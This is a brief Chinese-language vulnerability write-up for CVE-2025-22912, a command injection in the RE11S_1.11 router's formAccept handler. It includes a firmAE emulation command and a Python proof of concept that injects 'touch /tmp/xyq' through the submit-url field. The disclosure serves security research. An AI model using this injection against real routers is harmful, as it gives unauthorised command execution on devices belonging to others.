CVE-2025-22912
在奇安信天工实验室实习期间,我在 RE11S_1.11 路由器中发现了一个命令注入漏洞。
通过分析 bin 目录下的 webs 文件,我发现 formAccept 函数中包含一个命令注入漏洞。
该命令注入可通过 submit-url 键值触发,从而造成系统命令注入。

使用以下命令通过 firmAE 进行仿真。
sudo ./run.sh -r v1 ~/IOT/RE11S_1.11/RE11S_1.11.bin
poc.py 文件的内容如下:
import requests
url = "http://192.168.9.2/goform/formAccept"
data = {
"submit-url":"touch /tmp/xyq"
}
r = requests.post(url,data=data)
print(r.text)

可以看到,执行后新增了一个 /tmp/xyq 文件,证明攻击成功。